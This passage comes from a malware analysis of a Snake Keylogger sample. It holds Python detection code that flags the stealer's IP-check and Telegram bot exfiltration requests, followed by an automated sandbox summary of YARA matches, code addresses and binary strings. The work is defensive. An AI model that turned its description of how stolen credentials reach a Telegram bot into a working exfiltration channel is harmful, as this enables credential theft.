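    if req["headers"].get("host", "").lower() != "api.telegram.org":
        return None
    url = urlsplit(req["target"])
    m = BOT_PATH.match(url.path)
    if not m:
        return None
    query = parse_qs(url.query)  # parse_qs percent-decodes the values
    return {
        "kind": "telegram_exfil",
        "bot_id": m["bot_id"],
        "bot_token": f"{m['bot_id']}:{m['secret']}",
        "api_method": m["method"],
        "chat_id": query.get("chat_id", [None])[0],
        "caption": query.get("caption", [""])[0],
        "multipart": req["headers"].get("content-type", "").startswith("multipart/form-data"),
    }


def external_ip_check(req: dict) -> Optional[dict]:
    """Flag the public-IP lookup the stealer performs before exfiltrating."""
    host = req["headers"].get("host", "").lower()
    if host not in IP_CHECK_HOSTS:
        return None
    ua = req["headers"].get("user-agent", "")
    return {"kind": "external_ip_check", "host": host, "user_agent": ua,
            "legacy_user_agent": bool(LEGACY_UA.search(ua))}


def analyze(raw_requests) -> List[dict]:
    findings = []
    for raw in raw_requests:
        req = parse_request_head(raw)
        for check in (external_ip_check, telegram_exfil):
            hit = check(req)
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_REQUESTS):
        print(finding)
```

The bot token is the operator's credential for the Bot API and the chat_id names the receiving chat; both are indicators to block and to report to Telegram, not something to query from an analysis host. The decoded caption (" Pc Name: user | Snake Tracker", then "PW | user | Snake") is what the operator sees in the chat next to the uploaded file, and the bot_token/chat_id pair the function returns is exactly what the two configuration extractors earlier in the report recovered from memory.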

                System Summary

Source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTR | Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: RegAsm.exe PID: 6132, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegAsm.exe PID: 6132, type: MEMORYSTR | Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: C:\Users\user\Desktop\project plan.exe | Code function: 0_2_00007FF848F1194D
Source: C:\Users\user\Desktop\project plan.exe | Code function: 0_2_00007FF848F10B3C
Source: C:\Users\user\Desktop\project plan.exe | Code function: 0_2_00007FF848F14620
Source: C:\Users\user\Desktop\project plan.exe | Code function: 0_2_00007FF848F19680
Source: C:\Users\user\Desktop\project plan.exe | Code function: 0_2_00007FF848F1BD90
Source: C:\Users\user\Desktop\project plan.exe | Code function: 0_2_00007FF848F105F0
Source: C:\Users\user\Desktop\project plan.exe | Code function: 0_2_00007FF848F24F03
Source: C:\Users\user\Desktop\project plan.exe | Code function: 0_2_00007FF848F11F30
Source: C:\Users\user\Desktop\project plan.exe | Code function: 0_2_00007FF848F24F50
Source: C:\Users\user\Desktop\project plan.exe | Code function: 0_2_00007FF848F10F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00F6C19C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00F6A100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00F693E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00F634F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00F688C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00F69841
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00F69CA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00F66DDF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00F68E97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00F67E49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00F662EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00F66300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00F688B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00F68F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_06146A38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_06143A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_06146E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_06143EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_061472E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0614DAE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_06144320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_06147740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_06144778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_06147B98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_06144BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_061407C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_06147FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_06145028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0614F028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0614E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_06148448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_06145480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0614F480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_061488A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_061458D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0614F8D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_06148CF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_06145D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_06149150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0614ED68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_06146188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_061495A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_061465E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0614CDE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_06146A29
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0614CA5F3_2_0614CA5F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0614CA703_2_0614CA70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06143A603_2_06143A60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06146E803_2_06146E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06143EB93_2_06143EB9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061472D83_2_061472D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061443103_2_06144310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061477333_2_06147733
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061447683_2_06144768
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06147B883_2_06147B88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06144BC13_2_06144BC1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06147FE33_2_06147FE3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0614F0133_2_0614F013
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061450183_2_06145018
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061400373_2_06140037
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061484383_2_06148438
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061400403_2_06140040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0614E8403_2_0614E840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061454703_2_06145470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0614F4703_2_0614F470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061488973_2_06148897
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0614C0D93_2_0614C0D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061458C83_2_061458C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0614F8C93_2_0614F8C9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06148CE93_2_06148CE9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06145D2B3_2_06145D2B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061491403_2_06149140
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0614617B3_2_0614617B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0614C1803_2_0614C180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061465D43_2_061465D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061646083_2_06164608
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061624503_2_06162450
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061604983_2_06160498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061665883_2_06166588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061600403_2_06160040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06164C583_2_06164C58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06162D003_2_06162D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06166BD83_2_06166BD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061628A83_2_061628A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061608F03_2_061608F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061617483_2_06161748
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061635B03_2_061635B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061672283_2_06167228
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061652A03_2_061652A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061693D23_2_061693D2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061631583_2_06163158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06165F383_2_06165F38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06163FB83_2_06163FB8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06161FF83_2_06161FF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06161BA03_2_06161BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061678703_2_06167870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061658E83_2_061658E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061624403_2_06162440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061604883_2_06160488
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061665783_2_06166578
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061645F83_2_061645F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061600063_2_06160006
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06164C483_2_06164C48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06162CF13_2_06162CF1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06166BC83_2_06166BC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061628983_2_06162898
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061608E03_2_061608E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061617393_2_06161739
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061635A03_2_061635A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061672193_2_06167219
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061652903_2_06165290
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061631483_2_06163148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06165F293_2_06165F29
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06163FA93_2_06163FA9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06161FE93_2_06161FE9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06161B8F3_2_06161B8F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0616785F3_2_0616785F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061658D83_2_061658D8
                Source: C:\Users\user\Desktop\project plan.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1536 -s 1028
                Source: project plan.exe | Static PE information: No import functions for PE file found
                Source: project plan.exe, 00000000.00000000.1960972899.0000016754A42000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameIrulogixihejo> vs project plan.exe
                Source: project plan.exe, 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs project plan.exe
                Source: project plan.exe, 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameEcozezoviD vs project plan.exe
                Source: project plan.exe, 00000000.00000002.2171707647.000001676EE60000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameEcozezoviD vs project plan.exe
                Source: project plan.exe | Binary or memory string: OriginalFilenameIrulogixihejo> vs project plan.exe
                Source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
